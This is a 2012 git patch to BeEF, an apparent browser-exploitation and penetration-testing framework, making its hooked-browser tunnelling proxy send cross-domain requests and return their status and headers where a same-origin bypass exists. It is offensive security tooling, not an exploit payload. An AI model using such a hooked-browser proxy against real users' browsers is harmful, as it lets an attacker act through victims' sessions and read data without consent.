From 1fd66bce1e4faad3b9859844651d8b7524174544 Mon Sep 17 00:00:00 2001
From: Mike Haworth <mike@aurainfosec.com>
Date: Sun, 13 May 2012 13:08:13 +1200
Subject: [PATCH] Issue #666 Proxy now uses forge_request, allowing cross
 domaian requests, for instances where SOP bypass is available

---
 core/main/client/net.js   | 19 +++++++++++--------
 extensions/proxy/proxy.rb |  4 ++--
 2 files changed, 13 insertions(+), 10 deletions(-)

diff --git a/core/main/client/net.js b/core/main/client/net.js
index 84c6305f7..e48920b0d 100644
--- a/core/main/client/net.js
+++ b/core/main/client/net.js
@@ -176,9 +176,9 @@ beef.net = {
            $j.ajaxSetup({
               dataType: dataType
            });
-        }else{ //GET, HEAD, ...
+        }else if ( beef.browser.isIE() ) { //set dataType script when GET, HEAD, for IE only
            $j.ajaxSetup({
-               dataType: 'script'
+                dataType: 'script'
            });
         }
 
@@ -286,8 +286,13 @@ beef.net = {
           });
         }
 
+        // this is required for bugs in IE so data can be transfered back to the server
+        if ( beef.browser.isIE() ) {
+            dataType = 'script'
+        }
+
         $j.ajax({type: method,
-            dataType: 'script', // this is required for bugs in IE so data can be transfered back to the server
+            dataType: dataType,
             url: url,
             headers: headers,
             timeout: (timeout * 1000),
@@ -324,11 +329,9 @@ beef.net = {
             complete: function(xhr, textStatus) {
                 // cross-domain request
                 if (cross_domain) {
-                    response.status_code = -1;
-                    response.status_text = "crossdomain";
-                    response.port_status = "crossdomain";
-                    response.response_body = "ERROR: Cross Domain Request. The request was sent however it is impossible to view the response.\n";
-                    response.headers = "ERROR: Cross Domain Request. The request was sent however it is impossible to view the response.\n";
+                    response.status_code = xhr.status;
+                    response.status_text = textStatus;
+                    response.headers = xhr.getAllResponseHeaders();
                 } else {
                     // same-domain request
                     response.status_code = xhr.status;
diff --git a/extensions/proxy/proxy.rb b/extensions/proxy/proxy.rb
index eb4ee0dca..3dfdb6cd4 100644
--- a/extensions/proxy/proxy.rb
+++ b/extensions/proxy/proxy.rb
@@ -82,10 +82,10 @@ module BeEF
               :path => uri.path,
               :request_date => Time.now,
               :hooked_browser_id => self.get_tunneling_proxy,
-              :allow_cross_domain => "false"
+              :allow_cross_domain => "true"
           )
           http.save
-          print_debug("[PROXY] --> Forwarding request ##{http.id}: domain[#{http.domain}:#{http.port}], method[#{http.method}], path[#{http.path}]")
+          print_debug("[PROXY] --> Forwarding request ##{http.id}: domain[#{http.domain}:#{http.port}], method[#{http.method}], path[#{http.path}], cross domain[#{http.allow_cross_domain}]")
 
           # Wait for the HTTP response to be stored in the db.
           # TODO: re-implement this with EventMachine or with the Observer pattern.